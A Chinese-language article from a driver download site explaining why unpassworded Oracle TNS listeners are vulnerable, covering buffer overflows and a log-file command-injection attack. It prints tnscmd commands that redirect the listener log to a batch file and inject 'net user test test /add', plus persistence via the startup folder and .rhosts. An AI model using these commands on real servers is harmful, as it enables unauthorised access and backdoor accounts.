驱动管家:安全、高效、精准的专业驱动下载站!

tns listener攻击的原因 tns listener没有设置口令受到哪些攻击?

2018-02-27 15:06:03责编:llp   来源:驱动管家     人气:

首先,根据版本的不同,TNS listener可能较易受到多种类型的缓冲区溢出攻击,这些攻击可以在不提供用户ID和口令的情况下被利用。例如:在oracle 9i中,当客户机请求某个过长的service_name时,很容易受到溢出攻击。当listener为日志构建错误消息之后,service_name的值会被复制到某于栈结构的缓冲区内,从而引起溢出—覆盖保存值将返回栈中的地址。这种做法可以使攻击者获得控制权。事实上,TNS listener曾经有过多次溢出和格式化字符串的漏洞。

其次,另一类攻击和日志文件有关。只有当未给listener设置口令的时候,攻击才会有效。假设某个listener没有设置口令,攻击方法如下:

tns listener攻击的原因 tns listener没有设置口令受到哪些攻击?

tnscmd -h www.example.com -p 1521 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_directory)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=c:\\)))”将日志目录设置到C盘

tnscmd -h www.example.com -p 1521 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=test.bat)))”将日志文件设置为test.bat

tnscmd -h www.example.com –rawcmd “(CONNECT_DATA=(( ||dir >test.txt||net user test test /add))”该命令把dir >test.txt、net user test test /add命令写入c:\test.bat文件,由于双竖线的作用(第一条命令执行失败后,WINDOWS命令解释器执行后面的命令)把错误的信息注释掉, 从而可以执行我们提交的命令。

通过设置日志文件到不同的目录,例如WINDOWS的启动目录,当服务器重启将执行恶意用户提交的特定代码,从而对系统造成威胁。

运行于UNIX系统上的oracle也会受到同样的威胁。其中一种方法就是将“”回送给.rhost文件,当系统运行时,使用r*services命令。

  • 怎么利用3389端口入侵?获得网站权限可以做什么?

    怎么利用3389端口入侵?获得网站权限可以做什么?

    昨天晚上,朋友给我一台漏洞颇多的主机,哈哈,我没别的意思,只是练一下手而已,顺便把过程写下来,这台主机的漏洞实在多,CGI漏洞就30多个,SQL的sa这个用户的密码为空,开的端口12个,这台主机是100M的宽带,

    详情2018-02-23 15:54:01责编:llp   来源:驱动管家     
  • 什么是ata硬盘密码锁?ata密码保护怎么被击破?

    什么是ata硬盘密码锁?ata密码保护怎么被击破?

    有些人利用ATA密码来保护储存在计算机硬盘中的数据,但是在大多数情况下攻击者都能轻松破译ATA密码,全面访问硬盘中的数据。在美国,盗取个人及企业计算系统中的敏感信息已成为增长速度最快的罪行之一。据Gartner

    详情2018-02-03 14:07:23责编:llp   来源:驱动管家     
  • bind缓存所有查询过的结果会引起哪些问题?

    bind缓存所有查询过的结果会引起哪些问题?

    定义:DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,

    详情2018-02-17 08:45:40责编:llp   来源:驱动管家     
  • 电脑杀毒的神奇方法:记事本杀毒

    电脑杀毒的神奇方法:记事本杀毒

    网友们在电脑遇到病毒时,肯定是要杀毒的,但是使用杀毒的方法都是用一般的操作,比如杀毒软件、打开进程管理器关闭不熟悉的进程等。这样的杀毒方式好似太过于单一啦!所以今天小编就为网友们了解一种神奇的杀毒方

    详情2018-01-18 14:12:25责编:llp   来源:驱动管家     
  • 安装ip安全策略自动设置工具,打不开防火墙怎么办?

    安装ip安全策略自动设置工具,打不开防火墙怎么办?

    我最新在服务器上使用了IP安全策略自动设置工具,服务器是web站点,开80,20,21,3389等。服务器安装eset杀毒软件(nod32)带防火墙,系统启动防火墙只允许相对应端口。然后直接运行这个“Win 服务器过滤策略 exe”

    详情2018-02-08 16:11:03责编:llp   来源:驱动管家     
  • 哪些袭击手段可以毁掉整个互联网?网络攻击的十种方法

    哪些袭击手段可以毁掉整个互联网?网络攻击的十种方法

    互联网的安全在今天越来越被更多的人重视。人们采用各种办法来保护网络安全。可总也避免不了这样那样的攻击、漏洞。下面例举了十种可瞬间毁掉整个互联网的袭击手段,让大家看看。也希望大家在日常上网或工作时能

    详情2018-02-17 14:04:09责编:llp   来源:驱动管家     
  • 脱壳软件有哪些?常用脱壳工具有哪些?

    脱壳软件有哪些?常用脱壳工具有哪些?

    在自然界中,我想大家对壳这东西应该都不会陌生了,由上述故事,我们也可见一斑。自然界中植物用它来保护种子,动物用它来保护身体等等。同样,在一些计算机软件里也有一段专门负责保护软件不被非法修改或反编译

    详情2018-01-19 14:07:23责编:llp   来源:驱动管家     
  • 如何删除病毒危险文件cdaengine0400.dll?

    如何删除病毒危险文件cdaengine0400.dll?

    cdaEngine0400 dll早期被报告为间谍软件,但新的报告显示该文件的新版本是干净的。我们仍然没有该文件,只提供删除说明。卸载通知WildTangentNotice删除WildTangent可能会导致该程序打包不能按预期的功能。卸载过

    详情2018-02-14 11:55:17责编:llp   来源:驱动管家     
  • 全站文章系统采用fso静态生成的html来显示的网站如何入侵?

    全站文章系统采用fso静态生成的html来显示的网站如何入侵?

    大家在是否碰到过这样的站点:全站文章系统采用FSO静态生成的HTML文件来显示。这样做的好处一来可以减轻服务器负担,提高访问速度。二来也阻止了SQL注入式的攻击。。我来说说他们的文章系统原理:全部文章均在数

    详情2018-02-10 16:33:32责编:llp   来源:驱动管家     
  • oracle教程 oracle的相关问题及解答

    oracle教程 oracle的相关问题及解答

    1 如何查看ORACLE的隐含参数?ORACLE的显式参数,除了在INIT ORA文件中定义的外,在svrmgrl中用 "show parameter * ",可以显示。但ORACLE还有一些参数是以“_”,开头的。如我们非常熟悉的“_offline_rollback_

    详情2018-01-15 16:49:57责编:llp   来源:驱动管家